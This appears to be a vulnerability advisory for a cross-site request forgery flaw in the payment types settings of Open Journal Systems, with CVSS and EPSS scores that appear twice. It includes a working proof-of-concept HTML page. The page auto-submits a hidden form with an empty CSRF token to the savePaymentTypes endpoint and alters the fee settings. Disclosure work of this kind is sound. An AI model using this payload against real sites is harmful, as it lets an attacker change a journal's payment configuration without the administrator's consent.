8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
0.001 Low
EPSS
Percentile
22.4%
Description
CSRF in Payment Types
Proof of Concept
1 .Attacker send form fake to user
<html>
<body>
<form action="https://demo.publicknowledgeproject.org/ojs3/testdrive/index.php/testdrive-journal/payments/savePaymentTypes">
<input type="hidden" name="csrfToken" value="" />
<input type="hidden" name="publicationFee" value="3" />
<input type="hidden" name="purchaseIssueFee" value="3" />
<input type="hidden" name="purchaseArticleFee" value="3" />
<input type="hidden" name="restrictOnlyPdf" value="3" />
<input type="hidden" name="membershipFee" value="3" />
<input type="hidden" name="submitFormButton" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
2 .User click , edited unwanted payment types
Video Poc
https://drive.google.com/file/d/1jI4bW5BJXGdJ7kICI-K1Kmg5y2EPw7f0/view?usp=sharing
Payload Poc
https://drive.google.com/file/d/16fzxnTrHB4_IdGC1nqot2ovlp4elqq7H/view?usp=sharing
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
0.001 Low
EPSS
Percentile
22.4%